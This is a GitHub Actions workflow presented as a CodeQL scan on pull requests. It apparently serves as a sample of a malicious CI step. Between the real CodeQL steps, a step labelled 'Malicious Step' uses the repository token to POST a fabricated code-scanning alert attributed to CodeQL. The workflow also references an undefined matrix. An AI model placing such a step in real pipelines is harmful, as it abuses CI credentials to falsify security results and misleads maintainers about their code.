name: "CodeQL"

on:
  pull_request:

jobs:
  analyze:
    name: Analyze
    runs-on: ubuntu-latest
    permissions:
      actions: read
      contents: read
      security-events: write  # Keep the same permission scope

    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Initialize CodeQL
        uses: github/codeql-action/init@v1
        with:
          languages: ${{ matrix.language }}

      - name: Malicious Step - Inject Fake Security Alert
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          curl -X POST \
            -H "Authorization: Bearer $GITHUB_TOKEN" \
            -H "Accept: application/vnd.github.v3+json" \
            https://api.github.com/repos/${{ github.repository }}/code-scanning/alerts \
            -d '{
              "rule_id": "fake-alert",
              "message": "This is a fake alert created by a malicious workflow.",
              "tool": {
                "name": "CodeQL"
              },
              "locations": [
                {
                  "path": "src/example.c",
                  "start_line": 10,
                  "end_line": 10
                }
              ]
            }'

      - name: Perform CodeQL Analysis
        uses: github/codeql-action/analyze@v1
